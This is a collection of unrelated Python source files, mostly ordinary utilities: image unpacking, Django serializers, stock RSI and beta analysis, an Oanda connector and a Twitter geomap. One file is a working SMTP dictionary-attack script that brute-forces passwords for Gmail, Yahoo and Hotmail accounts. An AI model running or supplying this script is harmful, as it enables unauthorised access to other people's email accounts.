name of directory to create when unpacking data
splitPercent : float
decimal representing percentage of data to retain for test set
dimImage : tuple
a tuple of integers such that (h, w, c) corresponds to height, width and channels
fileName : str
data file name, expects .csv in semi-colon, comma, pipe or tsv format
containsLabels : bool
denotes if labels are present in the dataset, default False, expected label column index = [-1]
colorEncode : str
color encoding for the resulting image, default 'RGB'
pixDtype : str
expected data type for pixels, default 'float64'
Returns
-------
str
file path to the directory containing generated images
"""
counter = {}
labelMap = {}
filePathMap = {
0:{},
1:{}
}
classFilePaths = {
'train':[],
'test':[]
}
for i, j in enumerate(classNames):
labelMap[str(i)] = j
filePathMap[0][str(i)] = ''
filePathMap[1][str(i)] = ''
#Paths for the directory
parentPath = os.path.join(loc, dirName)
trainPath = os.path.join(parentPath, 'train')
testPath = os.path.join(parentPath, 'test')
try:
os.mkdir(parentPath)
os.mkdir(trainPath)
os.mkdir(testPath)
print(f'Directory \'{dirName}\' created')
for cl in classNames:
fpTrain = os.path.join(trainPath, cl)
fpTest = os.path.join(testPath, cl)
classFilePaths['train'].append(fpTrain)
classFilePaths['test'].append(fpTest)
os.mkdir(fpTrain)
os.mkdir(fpTest)
print(f' {cl} class train/test directories created')
for i, itemTrain, itemTest in zip(range(len(classNames)), classFilePaths['train'], classFilePaths['test']):
i = str(i)
filePathMap[0][i] = itemTrain
filePathMap[1][i] = itemTest
except FileExistsError:
print(f'{dirName} already exists - consider deleting the directory for a clean install!')
print(f'Unpacking {fileName}...\nPlease wait...')
with open(fileName) as csv_file:
numSamples = sum(1 for line in csv_file)-1
test_idx = [random.randint(0, numSamples) for i in range(int(numSamples * splitPercent))]
delim = csv.Sniffer().sniff(csv_file.readline())
csv_file.seek(0)
csv_reader = csv.reader(csv_file, delim)
next(csv_reader)
fileCount = 0
        for row in csv_reader:
            if fileCount % 1000 == 0: print(f'Unpacking {fileCount}/{numSamples}...', end=' ')
            # Capture the label before stripping it, otherwise row[-1] is the last pixel value
            label = row[-1][0] if containsLabels else '0'
            if containsLabels: row = row[:-1]
            pixels = np.array(row, dtype=pixDtype)  # honor the pixDtype parameter instead of hardcoding
            pixels = pixels.reshape(dimImage)
            image = Image.fromarray(pixels, colorEncode)
if label not in counter: counter[label] = 0
counter[label] += 1
filename = f'{labelMap[label]}{counter[label]}.png'
if fileCount in test_idx:
filepath = os.path.join(filePathMap[1][label], filename)
else:
filepath = os.path.join(filePathMap[0][label], filename)
image.save(filepath)
            if fileCount % 1000 == 999: print('Completed')
fileCount += 1
print(f'Unpacking complete. {fileCount} images parsed.')
print(f'Directory located at {parentPath}')
return parentPath
def parse_and_dump(loc, dirName, dimImage, pixels=None, active='current', colorEncode='RGB'):
"""
A lightweight handball function for reading single observation tabular data and converting to
image representation, i.e. websocket datastream. Tailored to a pytorch implementation
with an active/archive file system where current 'of-interest' image is handled in a directory
of 1 that is utilised by a classifier, then moved to archive to maintain small dataloader sizes.
Parameters
----------
loc : str
location to unpack to
dirName : str
name of directory to create when unpacking data
dimImage : tuple
a tuple of integers such that (h, w, c) corresponds to height, width and channels
pixels : array-like
array of pixel values to reshape
active : str
name of active folder
colorEncode : str
expected color encoding for resulting image
Returns
-------
str
file path to the directory containing the single image for loading
"""
parentPath = os.path.join(loc, dirName)
currentPath = os.path.join(parentPath, active)
dumpPath = os.path.join(parentPath, 'archive')
try:
os.mkdir(parentPath)
os.mkdir(currentPath)
os.mkdir(dumpPath)
print(f'Directory \'{dirName}\' created')
except FileExistsError:
print(f'{dirName} already exists - pushing image to {currentPath}')
if active == 'current':
filename = 'prediction.png'
filepath = os.path.join(currentPath, filename)
pixels = pixels.reshape(dimImage)
image = Image.fromarray(pixels, colorEncode)
image.save(filepath)
print(f'Image saved to {currentPath}')
else:
num_in_dir = len(os.listdir(dumpPath))
        filename = f'prediction{num_in_dir + 1}.png'
filepath = os.path.join(dumpPath, filename)
shutil.move(currentPath+'/prediction.png', filepath)
print(f'Image moved to {dumpPath}')
return currentPath
```
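The core of the unpacking loop is turning one flattened CSV row into a PNG. A self-contained sketch of that step on fabricated 4x4 RGB data; note that `Image.fromarray` expects `uint8` pixels for `'RGB'` mode, which is why the configurable `pixDtype` matters.
```python
import numpy as np
from PIL import Image

dim_image = (4, 4, 3)                       # (height, width, channels)
row = np.random.randint(0, 256, 4 * 4 * 3)  # one flattened row of pixel values

pixels = np.array(row, dtype='uint8').reshape(dim_image)
image = Image.fromarray(pixels, 'RGB')
image.save('example.png')
print(image.size, image.mode)               # (4, 4) RGB
```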
|
{
"source": "jecrjunior/algorithms",
"score": 3
}
|
#### File: jecrjunior/algorithms/sendmail.py
```python
import smtplib
le = "\r\n"
def send(from_addr, to_addr_list, cc_addr_list,
subject, message,
login, password,
smtpserver='smtp.gmail.com:587'):
    header = 'From: {0}{1}'.format(from_addr, le)
    header += 'To: {0}{1}'.format(', '.join(to_addr_list), le)
    header += 'Cc: {0}{1}'.format(', '.join(cc_addr_list), le)
    header += 'Subject: {0}{1}'.format(subject, le)
message = header + message
server = smtplib.SMTP(smtpserver)
server.starttls()
server.login(login,password)
problems = server.sendmail(from_addr, to_addr_list, message)
server.quit()
def set_font_face(text):
return text
#return "<font face=\"verdana\">" + text + "</font>"
lint_file = open("./lint_report.txt", 'r')
lint_report = ""
for line in lint_file.readlines():
lint_report += line
lint_file.close()
test_file = open("./test_report.txt", 'r')
test_report = ""
for line in test_file.readlines():
test_report += line
test_file.close()
report = le
report += "Here is your lint report:{0}".format(le*2)
report += lint_report
report += le*2
report += "Here is your test report:{0}".format(le*2)
report += test_report
report = set_font_face(report)
send('<EMAIL>', ['<EMAIL>'], [], 'Quality results', report, '<EMAIL>', 'fakefakefake')
```
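A hedged alternative sketch using the standard library's `email.mime`, which builds the `To`/`Cc` headers correctly instead of interpolating raw Python lists; the addresses and credentials below are placeholders.
```python
import smtplib
from email.mime.text import MIMEText

def send_report(from_addr, to_addrs, subject, body,
                login, password, smtpserver='smtp.gmail.com:587'):
    msg = MIMEText(body)
    msg['From'] = from_addr
    msg['To'] = ', '.join(to_addrs)  # the header wants a comma-separated string
    msg['Subject'] = subject
    server = smtplib.SMTP(smtpserver)
    server.starttls()
    server.login(login, password)
    server.sendmail(from_addr, to_addrs, msg.as_string())
    server.quit()

# send_report('sender@example.com', ['recipient@example.com'],
#             'Quality results', report, 'sender@example.com', 'app-password')
```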
|
{
"source": "jecs580/django_second_app",
"score": 3
}
|
#### File: circles/serializers/circles.py
```python
from rest_framework import serializers
# Model
from cride.circles.models import Circle
class CircleModelSerializer(serializers.ModelSerializer):
"""Serializador para el modelo de Circulo"""
# Usamos estos campos opciones que pueden mandar en el request.
members_limit = serializers.IntegerField(
required=False,
min_value=10,
max_value=3200
    )  # Constrain members_limit so any supplied value is between 10 and 3200
is_limited = serializers.BooleanField(
default=False
)
class Meta:
"""Clase Meta"""
model = Circle
fields = (
'id', 'name', 'slug_name',
'about', 'picture', 'rides_offered',
'rides_taken', 'is_public', 'is_limited',
'members_limit'
        )  # Fields the serializer works with for all actions.
read_only_fields = (
'is_public',
'verified',
'rides_offered',
'rides_taken'
        )  # Fields regular users cannot change; only admins may modify them.
def validate(self, data):
"""Se asegura de que members_limit y is_limited esten presentes
o ninguno este presente.
"""
        members_limit = data.get('members_limit', None)  # Use get() because the field may not be
        # sent in the request, defaulting to None in that case
is_limited = data.get('is_limited', False)
if is_limited ^ bool(members_limit):
            raise serializers.ValidationError('If the circle is limited, a member limit must be provided')
return data
```
#### File: cride/users/permissions.py
```python
from rest_framework.permissions import BasePermission
class IsAccountOwner(BasePermission):
"""Permite acceso solo a los objetos propiedad del usuario solicitante"""
    def has_object_permission(self, request, view, obj):
        """Check that obj and the requesting user are the same."""
        return request.user == obj  # obj is the object resolved from the URL, since this permission
        # is applied to retrieve actions that take a username. The comparison returns True (grant)
        # or False (deny), acting as both the condition and the return value.
```
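The XOR in `validate` is the whole trick: `is_limited ^ bool(members_limit)` is true exactly when one flag is set without the other. A tiny standalone sketch of that truth table:
```python
def consistent(is_limited, members_limit):
    """Mirror of the serializer rule: both fields set, or neither."""
    return not (is_limited ^ bool(members_limit))

cases = [(False, None), (True, 50), (True, None), (False, 50)]
for is_limited, members_limit in cases:
    verdict = 'valid' if consistent(is_limited, members_limit) else 'invalid'
    print(f'is_limited={is_limited}, members_limit={members_limit} -> {verdict}')
```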
|
{
"source": "JECSand/pandas_sqlalchemy_technical_analysis",
"score": 3
}
|
#### File: JECSand/pandas_sqlalchemy_technical_analysis/pandas_with_sqlalchemy.py
```python
import pip

# Package installer function to handle missing packages
def install(package):
print(package + ' package for Python not found, pip installing now....')
pip.main(['install', package])
print(package + ' package has been successfully installed for Python\n Continuing Process...')
try:
from yahoofinancials import YahooFinancials
except:
install('yahoofinancials')
from yahoofinancials import YahooFinancials
try:
import pandas as pd
import numpy as np
except:
install('pandas')
import pandas as pd
import numpy as np
try:
import sqlalchemy
from sqlalchemy import *
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Numeric, DateTime
from sqlalchemy.orm import sessionmaker
except:
install('sqlalchemy')
import sqlalchemy
from sqlalchemy import *
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Numeric, DateTime
from sqlalchemy.orm import sessionmaker
'''
Script Setup Variables
'''
# Enter your PostgreSQL Database Information here
user_name = 'username'
password = 'password'
host = 'host/end-point'
port = 'port'
database = 'database_name'
db_conn_str = 'postgresql://' + user_name + ':' + password + '@' + host + ':' + port + '/' + database
# Connect to the AWS PostgreSQL Database
engine = create_engine(db_conn_str)
Base = declarative_base()
conn = engine.connect()
# Select Tickers and stock history dates
ticker = 'AAPL'
ticker2 = 'MSFT'
ticker3 = 'INTC'
index = '^NDX'
freq = 'daily'
start_date = '2012-10-01'
end_date = '2017-10-01'
# Model Tables and create if they do not exist
metadata = MetaData()
rsiTable = Table('rsiTable', metadata,
Column('id', Integer, primary_key=True),
Column('Date', DateTime),
Column('NDX', Numeric),
Column('AAPL', Numeric),
Column('MSFT',Numeric),
Column('INTL', Numeric)
)
betaTable = Table('betaTable', metadata,
Column('id', Integer, primary_key=True),
Column('Date', DateTime),
Column('AAPL', Numeric),
Column('MSFT', Numeric),
Column('INTL', Numeric)
)
rsiTable.create(engine)
betaTable.create(engine)
# Declaration of the RSI Table class in order to write RSI data into the database.
class RSITable(Base):
__tablename__ = 'rsiTable'
id = Column(Integer, primary_key=True)
Date = Column(DateTime())
NDX = Column(Numeric())
AAPL = Column(Numeric())
MSFT = Column(Numeric())
INTL = Column(Numeric())
def __repr__(self):
return "(id='%s', Date='%s', NDX='%s', AAPL='%s, MSFT='%s', INTL='%s')" % \
(self.id, self.Date, self.NDX, self.AAPL, self.MSFT, self.INTL)
# Declaration of the Beta Table class in order to write Beta Data into the database.
class BetaTable(Base):
__tablename__ = 'betaTable'
id = Column(Integer, primary_key=True)
Date = Column(DateTime())
AAPL = Column(Numeric())
MSFT = Column(Numeric())
INTL = Column(Numeric())
def __repr__(self):
return "(id='%s', Date='%s', AAPL='%s, MSFT='%s', INTL='%s')" % \
(self.id, self.Date, self.AAPL, self.MSFT, self.INTL)
# Function to clean data extracts
def clean_stock_data(stock_data_list):
new_list = []
for rec in stock_data_list:
if 'type' not in rec.keys():
new_list.append(rec)
return new_list
# Construct yahoo financials objects for data extraction
aapl_financials = YahooFinancials(ticker)
mfst_financials = YahooFinancials(ticker2)
intl_financials = YahooFinancials(ticker3)
index_financials = YahooFinancials(index)
# Clean returned stock history data and remove dividend events from price history
daily_aapl_data = clean_stock_data(aapl_financials
.get_historical_stock_data(start_date, end_date, freq)[ticker]['prices'])
daily_msft_data = clean_stock_data(mfst_financials
.get_historical_stock_data(start_date, end_date, freq)[ticker2]['prices'])
daily_intl_data = clean_stock_data(intl_financials
.get_historical_stock_data(start_date, end_date, freq)[ticker3]['prices'])
daily_index_data = index_financials.get_historical_stock_data(start_date, end_date, freq)[index]['prices']
stock_hist_data_list = [{'NDX': daily_index_data}, {'AAPL': daily_aapl_data}, {'MSFT': daily_msft_data},
{'INTL': daily_intl_data}]
'''
Stock Beta Algorithm
'''
# Function to construct data frame based on a stock and it's market index
def build_beta_data_frame(data_list1, data_list2, data_list3, data_list4):
data_dict = {}
i = 0
for list_item in data_list2:
if 'type' not in list_item.keys():
data_dict.update({list_item['formatted_date']: {'NDX': data_list1[i]['close'], 'AAPL': list_item['close'],
'MSFT': data_list3[i]['close'],
'INTL': data_list4[i]['close']}})
i += 1
tseries = pd.to_datetime(list(data_dict.keys()))
df = pd.DataFrame(data=list(data_dict.values()), index=tseries,
columns=['NDX', 'AAPL', 'MSFT', 'INTL']).sort_index()
return df
# Function to create the groupby object ready for beta analysis
def roll_function(df, w):
roll_array = np.dstack([df.values[i:i+w, :] for i in range(len(df.index) - w + 1)]).T
panel = pd.Panel(roll_array,
items=df.index[w-1:],
major_axis=df.columns,
minor_axis=pd.Index(range(w), name='roll'))
return panel.to_frame().unstack().T.groupby(level=0)
# Function to calculate Stock Beta
def calc_beta(df):
X = df.values[:, [0]]
X = np.concatenate([np.ones_like(X), X], axis=1)
b = np.linalg.pinv(X.T.dot(X)).dot(X.T).dot(df.values[:, 1:])
return pd.Series(b[1], df.columns[1:], name='Beta')
# Function to kick off stock beta calculation process
def get_stock_beta_df():
df = build_beta_data_frame(daily_index_data, daily_aapl_data, daily_msft_data, daily_intl_data)
roll_df = roll_function(df, 260)
beta_vals = roll_df.apply(calc_beta)
return beta_vals
'''
Stock RSI Algorithm
'''
# Function to build stock price series
def build_price_series(data_list):
series_data_list = []
series_date_list = []
for list_item in data_list:
series_data_list.append(list_item['close'])
series_date_list.append(list_item['formatted_date'])
tseries = pd.to_datetime(series_date_list)
ds = pd.Series(series_data_list, index=tseries).sort_index(ascending=True)
return ds
# Function to calculate stock's RSI
def calc_stock_rsi(prices, n=14):
gain = (prices-prices.shift(1)).fillna(0)
def calc_rsi(price):
avg_gain = price[price>0].sum()/n
avg_loss = -price[price<0].sum()/n
rs = avg_gain/avg_loss
return 100 - 100/(1+rs)
return pd.rolling_apply(gain,n,calc_rsi)
# Function to kick off stock rsi calculation process
def get_stock_rsi_df():
ds_list = []
column_list = []
for li_dict in stock_hist_data_list:
for k, v in li_dict.items():
ds = build_price_series(v)
rsi_vals = calc_stock_rsi(ds)
ds_list.append(rsi_vals)
column_list.append(k)
df = pd.concat(ds_list, axis=1)
df.columns = column_list
return df
# Main Function of the Script
def main():
rsi_df = get_stock_rsi_df()
beta_df = get_stock_beta_df()
rsi_df.reset_index(inplace=True)
rsi_df.rename(columns={'index': 'Date'}, inplace=True)
beta_df.reset_index(inplace=True)
beta_df.rename(columns={'index': 'Date'}, inplace=True)
print('Beta Dataframe: ')
print(beta_df)
print('\nRSI Dataframe')
print(rsi_df)
rsiTableToWriteTo = 'rsiTable'
betaTableToWriteTo = 'betaTable'
rsi_df.to_sql(name=rsiTableToWriteTo, con=engine, if_exists='append', index=False)
beta_df.to_sql(name=betaTableToWriteTo, con=engine, if_exists='append', index=False)
Session = sessionmaker(bind=engine)
session = Session()
session.commit()
session.close()
print('Process Complete! New Beta and RSI Data is now available in your PostgreSQL Database!')
main()
```
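`pd.rolling_apply` (and `pd.Panel`, used in the beta calculation) only exist in old pandas releases. A sketch of the same n-period RSI on synthetic prices using the current `Series.rolling` API; the zero-loss guard is an addition not present in the original.
```python
import numpy as np
import pandas as pd

def stock_rsi(prices, n=14):
    gain = (prices - prices.shift(1)).fillna(0)

    def calc_rsi(window):
        avg_gain = window[window > 0].sum() / n
        avg_loss = -window[window < 0].sum() / n
        if avg_loss == 0:            # guard added for an all-gains window
            return 100.0
        rs = avg_gain / avg_loss
        return 100 - 100 / (1 + rs)

    # Series.rolling(...).apply replaces the removed pd.rolling_apply
    return gain.rolling(n).apply(calc_rsi, raw=False)

prices = pd.Series(100 + np.random.randn(60).cumsum())
print(stock_rsi(prices).tail())
```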
|
{
"source": "JECSand/sample_pen_testing_toolkit",
"score": 3
}
|
#### File: JECSand/sample_pen_testing_toolkit/email_dictionary_attack.py
```python
import smtplib
import os
import sys
# Email Server Dictionary
available_server_dict ={'gmail.com': 'smtp.gmail.com', 'hotmail.com': 'smtp.live.com',
'live.com': 'smtp.live.com', 'yahoo.com': 'smtp.mail.yahoo.com',
'ymail.com': 'smtp.mail.yahoo.com', 'yahoo.co.uk': 'smtp.mail.yahoo.com',
'sbcglobal.net': 'smtp.mail.att.net', 'prodigy.net': 'smtp.mail.att.net',
'windstream.net': 'smtp.windstream.net', 'comcast.net': 'smtp.comcast.net'}
# OS Specific Parameters
os_system = os.name
if os_system == 'nt':
dict_dir = '\\dictionaries\\'
else:
dict_dir = '/dictionaries/'
# Function to get user name based on inputted email string
def get_server_conn_string(email_string, email_service):
parsed_email_domain = str(email_string.split('@')[1])
if parsed_email_domain in available_server_dict.keys():
smtp_string = available_server_dict[parsed_email_domain]
else:
smtp_string = available_server_dict[email_service]
return smtp_string
# Function to run dictionary attack
def run_dict_attack(target_email, selected_dictionary, email_service='gmail.com', port=587):
server_conn_string = get_server_conn_string(target_email, email_service)
smtpserver = smtplib.SMTP(server_conn_string, port)
smtpserver.ehlo()
smtpserver.starttls()
cwd = os.getcwd()
sel_dict = open(cwd + dict_dir + selected_dictionary, "r")
    for word in sel_dict:
        word = word.strip()  # strip the trailing newline so it isn't sent as part of the password
        try:
            smtpserver.login(target_email, word)
print("[*]--------> Success!\n [*]----------> User's Password Determined: " + word)
break
except smtplib.SMTPAuthenticationError:
print("[!]--------> Incorrect Password: " + word)
if __name__ == "__main__":
sys_arg_list = sys.argv
len_sys_arg = len(sys.argv)
print(len_sys_arg)
if len_sys_arg == 3:
run_dict_attack(sys.argv[1], sys.argv[2])
elif len_sys_arg == 4:
run_dict_attack(sys.argv[1], sys.argv[2], sys.argv[3])
elif len_sys_arg == 5:
run_dict_attack(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4]))
else:
print("[!]--------> Incorrect number of script parameters entered!")
sys.exit(1)
```
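The domain-to-server lookup is the only reusable piece here; on its own it just maps an address's domain through `available_server_dict` with a fallback. A minimal sketch:
```python
available_server_dict = {'gmail.com': 'smtp.gmail.com', 'hotmail.com': 'smtp.live.com'}

def get_server_conn_string(email_string, fallback='gmail.com'):
    """Map an email address's domain to its SMTP server, with a default fallback."""
    domain = email_string.split('@')[1]
    return available_server_dict.get(domain, available_server_dict[fallback])

print(get_server_conn_string('user@hotmail.com'))   # smtp.live.com
print(get_server_conn_string('user@unknown.org'))   # smtp.gmail.com
```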
|
{
"source": "JECSand/tradebots",
"score": 2
}
|
#### File: tradebots/connectors/oanda_connector.py
```python
import sys
import json
import datetime
import tradebots.utils.request_utils as request_utils
import tradebots.utils.math_utils as math_utils
import tradebots.utils.datetime_utils as datetime_utils
# Oanda Scale Mapping
time_scaling_map = {
'S': 'seconds',
'M': 'minutes',
'H': 'hours',
'D': 'days',
'W': 'weeks',
'M1': 'months'
}
# Class that instantiates a new Oanda Connection
class OandaConnector(object):
# Initialize an Oanda Connection Object
def __init__(self, secret_token, account_id, symbol, practice):
# Function that checks if token is valid
def check_settings(check_account_id, base_url, base_headers, check_type, check_symbol=None):
if check_type == 'accounts':
get_url = base_url + '/v3/accounts'
check_key = 'id'
check_param = check_account_id
else:
get_url = base_url + '/v3/accounts/' + check_account_id + '/instruments'
check_key = 'name'
check_param = check_symbol
try:
get_req = request_utils.get_request(get_url, base_headers)
if get_req.code != 200:
print('setup error: Token is not recognized by Oanda')
sys.exit(1)
else:
res_list = json.loads(get_req.read()).get(check_type, None)
if res_list is not None and len(res_list) > 0:
for res_obj in res_list:
if res_obj.get(check_key, None) == check_param:
return res_obj
print(str(check_type) + ' setup error: ' + str(check_param) + ' is not recognized by Oanda')
sys.exit(1)
except:
print('setup error: Token is not recognized by Oanda')
sys.exit(1)
# Object Initialization Variables
self.practice = practice
self.base_headers = {"Authorization": 'Bearer ' + str(secret_token)}
if practice is True:
self.base_url = 'https://api-fxpractice.oanda.com'
self.base_streaming_url = 'https://stream-fxpractice.oanda.com/'
else:
self.base_url = 'https://api-fxtrade.oanda.com'
self.base_streaming_url = 'https://stream-fxtrade.oanda.com/'
self.account_id = account_id
self.secret_token = secret_token
check_settings(self.account_id, self.base_url, self.base_headers, 'accounts')
self.symbol = symbol.replace('/', '_')
self.symbol_dict = check_settings(self.account_id, self.base_url, self.base_headers, 'instruments', self.symbol)
self.granularity_meta = {''}
# Private Static Method to generate historical candle stick req URL
@staticmethod
def _generate_candle_stick_url(base_get_url, price, granularity, start, end, smoothed, count):
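        # Build the query string incrementally; i counts how many parameters have been
        # appended so far, choosing '?' for the first and '&' thereafter.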
i = 0
if price is not None:
base_get_url += '?price=' + str(price)
i += 1
if granularity is not None:
if i == 0:
base_get_url += '?granularity=' + str(granularity)
else:
base_get_url += '&granularity=' + str(granularity)
i += 1
if count is not None:
if i == 0:
base_get_url += '?count=' + str(count)
else:
base_get_url += '&count=' + str(count)
i += 1
if start is not None:
if i == 0:
base_get_url += '?from=' + str(start).replace(':', '%3A')
else:
base_get_url += '&from=' + str(start).replace(':', '%3A')
i += 1
if end is not None:
base_get_url += '&to=' + str(end).replace(':', '%3A')
if smoothed is not None:
if i == 0:
base_get_url += '?smoothed=' + str(smoothed)
else:
base_get_url += '&smoothed=' + str(smoothed)
return base_get_url
# Public Method that returns a dictionary of historical candle stick values
def historical_candle_sticks(self, price=None, granularity=None, start=None, end=None, smoothed=None, count=None):
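        # Assumes the incoming timestamps carry fractional seconds (e.g. '...T00:00:00.000000000Z');
        # splitting on '.' drops them before parsing.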
start_dt = datetime.datetime.strptime(start.split('.')[0] + 'Z', '%Y-%m-%dT%H:%M:%SZ')
end_dt = datetime.datetime.strptime(end.split('.')[0] + 'Z', '%Y-%m-%dT%H:%M:%SZ')
scale = "".join([i for i in granularity if i.isalpha()])
interval = "".join([i for i in granularity if i.isdigit()])
time_scale = time_scaling_map[scale]
num_observations_data = math_utils.calc_num_of_observations(start_dt, end_dt, interval, time_scale)
num_observations = num_observations_data[0]
scaled_interval = num_observations_data[1]
print(num_observations)
seconds_per_request = int(scaled_interval * 3000)
num_of_requests = int(num_observations / 3000)
date_ranges_list = datetime_utils.generate_dt_range_map(num_of_requests, seconds_per_request, end_dt, start_dt)
base_get_url = self.base_url + '/v3/instruments/' + self.symbol + '/candles'
appended_re_candle_data = []
re_data = {}
for datetime_list in date_ranges_list:
c_start = datetime_list[0].isoformat("T") + "Z"
c_end = datetime_list[1].isoformat("T") + "Z"
get_url = self._generate_candle_stick_url(base_get_url, price, granularity, c_start, c_end, smoothed, count)
try:
print(get_url)
get_req = request_utils.get_request(get_url, self.base_headers)
if get_req:
if get_req.code != 200:
appended_re_candle_data.append({c_start + ' to ' + c_end: False})
else:
re_data = json.loads(get_req.read())
if len(appended_re_candle_data) > 0:
appended_re_candle_data += re_data['candles']
else:
appended_re_candle_data = re_data['candles']
except:
appended_re_candle_data.append({c_start + ' to ' + c_end: None})
re_data['candles'] = appended_re_candle_data
return re_data
# Public Method that returns a dictionary of current pricing data
def current_pricing_data(self):
get_url = self.base_url + '/v3/accounts/' + self.account_id + '/pricing?instruments=' + self.symbol
try:
get_req = request_utils.get_request(get_url, self.base_headers)
if get_req.code != 200:
return False
return json.loads(get_req.read())
except:
return False
# Public Method that returns a dictionary of current bollinger band values
def bollinger_band_data(self, granularity, current=True, start=None, end=None):
if current is True:
# get last 20 days worth of candle stick data for submitted granularity; if less than M10, run multiple pulls
end_dt = datetime.datetime.utcnow()
start_dt = end_dt - datetime.timedelta(days=22)
end = end_dt.isoformat("T") + "Z"
start = start_dt.isoformat("T") + "Z"
candle_sticks = self.historical_candle_sticks(None, granularity, start, end)
#TODO Calculate Bollinger Bands
return None
else:
pass
pass
# Public Method that executes an open trade order
def open_trade(self):
pass
# Public Method that executes a close trade order
def close_trade(self):
pass
```
|
{
"source": "JECSand/Twitter_Analytics",
"score": 3
}
|
#### File: JECSand/Twitter_Analytics/twitter_batched_geomap.py
```python
import os
import json
import random
import pip
import webbrowser
import config
# Package installer function to handle missing packages
def install(package):
print(package + ' package for Python not found, pip installing now....')
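    # Note: pip.main() was removed in pip 10+, so this helper assumes an older pip install.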
pip.main(['install', package])
print(package + ' package has been successfully installed for Python\n Continuing Process...')
try:
from geopy.geocoders import Nominatim
except:
install('geopy')
from geopy.geocoders import Nominatim
geolocator = Nominatim()
cwd = os.getcwd()
os_system = os.name
if os_system == 'nt':
raw_tweet_file_dir = cwd + '\\batch_extracts\\complete\\'
browser_map_dir = cwd + '\\browser_map\\'
geo_json_dir = browser_map_dir + '\\geojson\\'
else:
raw_tweet_file_dir = cwd + '/batch_extracts/complete/'
browser_map_dir = cwd + '/browser_map/'
geo_json_dir = browser_map_dir + '/geojson/'
# Function to get data from twitter batch files
def get_twitter_batch():
raw_tweets_list = []
for root, dirnames, filenames in os.walk(raw_tweet_file_dir):
for filename in filenames:
with open(os.path.join(root, filename), 'r') as raw_tweet_file:
for raw_tweet_json in raw_tweet_file:
raw_tweet = json.loads(raw_tweet_json)
raw_tweets_list.append(raw_tweet)
return raw_tweets_list
# Function to construct geojson feature
def get_geojson_feature(coordinates, text, created_at):
geo_json_feature = {
"type": "Feature",
"geometry": coordinates,
"properties": {
"text": text,
"created_at": created_at
}
}
return geo_json_feature
# Tweets are stored in "fname"
geo_data = {
"type": "FeatureCollection",
"features": []
}
print('Building geojson file\nThis may take a moment....')
for tweet in get_twitter_batch():
if tweet['lang'] == 'en':
if tweet['coordinates']:
geo_json_feature = get_geojson_feature(tweet['coordinates'], tweet['text'], tweet['created_at'])
geo_data['features'].append(geo_json_feature)
else:
if tweet['user']['location'] is not None:
if ',' in tweet['user']['location']:
geo_location = geolocator.geocode(tweet['user']['location'], timeout=None)
if geo_location is not None:
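                    # Jitter the geocoded point slightly so tweets from the same named location don't stack on one marker.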
                    geo_shift_val = random.randint(1, 9) / 1000000
                    tweet_coords = [geo_location.longitude - geo_shift_val, geo_location.latitude - geo_shift_val]
coords_objt = {"type": "Point", "coordinates": tweet_coords}
geo_json_feature = get_geojson_feature(coords_objt, tweet['text'], tweet['created_at'])
geo_data['features'].append(geo_json_feature)
# Save geo data
with open(geo_json_dir + 'geo_data.json', 'w') as fout:
fout.write(json.dumps(geo_data, indent=4))
print('Geojson file has been built! Opening browser to view map and exiting...')
# Open geomap html file in user's default webbrowser
local_url = browser_map_dir + 'twitter_geomap.html'
webbrowser.open('file://' + local_url, new=2)
```
|
{
"source": "Jecvay/PyGDB",
"score": 2
}
|
#### File: PyGDB/gdblib/TimedMessage.py
```python
import sys
import time
class TimedMessage:
logging = 0
def __init__(self, message):
self.start = time.time()
self.message = message
self.outcome = "aborted"
if self.logging:
print self.message + "..."
sys.stdout.flush()
def __del__(self):
if self.logging:
try:
print self.message + "..." + self.outcome + ". (" + \
'%.1f' % (time.time() - self.start) + "s)"
sys.stdout.flush()
except:
pass
```
#### File: Jecvay/PyGDB/PyGdbDb.py
```python
import pymysql
import PyGdbUtil
class PyGdbDb:
    # Initialization: connect to the database
def __init__(self, host, port, dbname, user, passwd):
self.project = None
self.table_prefix = None
try:
self.connection = pymysql.connect(
host=host, port=int(port), user=user, password=<PASSWORD>, db=dbname, charset="utf8mb4")
self.cursor = self.connection.cursor()
except Exception as e_con:
            print 'Database connection error, aborting'
print e_con
exit(-1)
    def test(self):
        print 'Testing the database connection'
        print 'Database connection: ' + str(self.connection.get_host_info()) if self.connection else 'Database connection error'
        print 'Database cursor: ' + str(self.cursor) if self.cursor else 'Database cursor error'
        print 'Database connection test finished'
        print 'Checking whether table aabb exists'
        if self.exist_table('aabb'):
            print 'It exists'
        else:
            print 'It does not exist'
        print 'Initializing project example'
        self.init_project('example', 'example_')
        self.new_project()
        PyGdbUtil.log(0, 'Initialization finished')
    # Initialize a project
def init_project(self, project_name, table_prefix):
self.project = project_name
self.table_prefix = table_prefix
    # Check whether the project exists; if not, create it and return True; if it already exists, return False
def new_project(self):
if not self.table_prefix:
            PyGdbUtil.log(2, 'No table prefix specified')
exist_project = self.exist_table(self.table_prefix + 'BreakPoint')
        # Create the database tables
if not exist_project:
self.create_table(self.table_prefix + "BreakPoint(bid INT AUTO_INCREMENT primary key, pid INT, lineNumber INT, funcName TEXT, funcList TEXT)")
self.create_table(self.table_prefix + "PStackSize(pid INT, tid INT, stackSize INT, pass TINYINT)")
self.create_table(self.table_prefix + "FStackSize(pid INT, tid INT, fid INT, stackSize INT)")
self.create_table(self.table_prefix + "FrameVariable(bid INT, varName CHAR, varValue TEXT, varSize INT)")
self.create_table(self.table_prefix + "FuncAdjacencyList(pid INT, tid INT, parFid INT, fid INT, cnt INT)")
self.create_table(self.table_prefix + "Function(fid INT, funcName CHAR(30))")
self.create_table(self.table_prefix + "TestCase(tid INT AUTO_INCREMENT primary key, testStr TEXT)")
self.commit()
return True
else:
return False
def clear_project(self):
if not self.table_prefix:
            PyGdbUtil.log(2, 'No table prefix specified')
exist_project = self.exist_table(self.table_prefix + 'BreakPoint')
if exist_project:
self.drop_table(self.table_prefix + "BreakPoint")
self.drop_table(self.table_prefix + "PStackSize")
self.drop_table(self.table_prefix + "FStackSize")
self.drop_table(self.table_prefix + "FrameVariable")
self.drop_table(self.table_prefix + "FuncAdjacencyList")
self.drop_table(self.table_prefix + "Function")
self.drop_table(self.table_prefix + "TestCase")
self.commit()
return True
else:
return False
    # Insert a test case
def insert_test_case(self, test_str):
self.execute("insert into " + self.table_prefix + "TestCase(testStr) VALUES('%s')" % test_str)
    # Insert a program breakpoint
def insert_breakpoint(self, pid, line_number, func_name):
        # return  # testing
PyGdbUtil.log(0, str(pid) + " " + str(line_number) + " " + str(func_name))
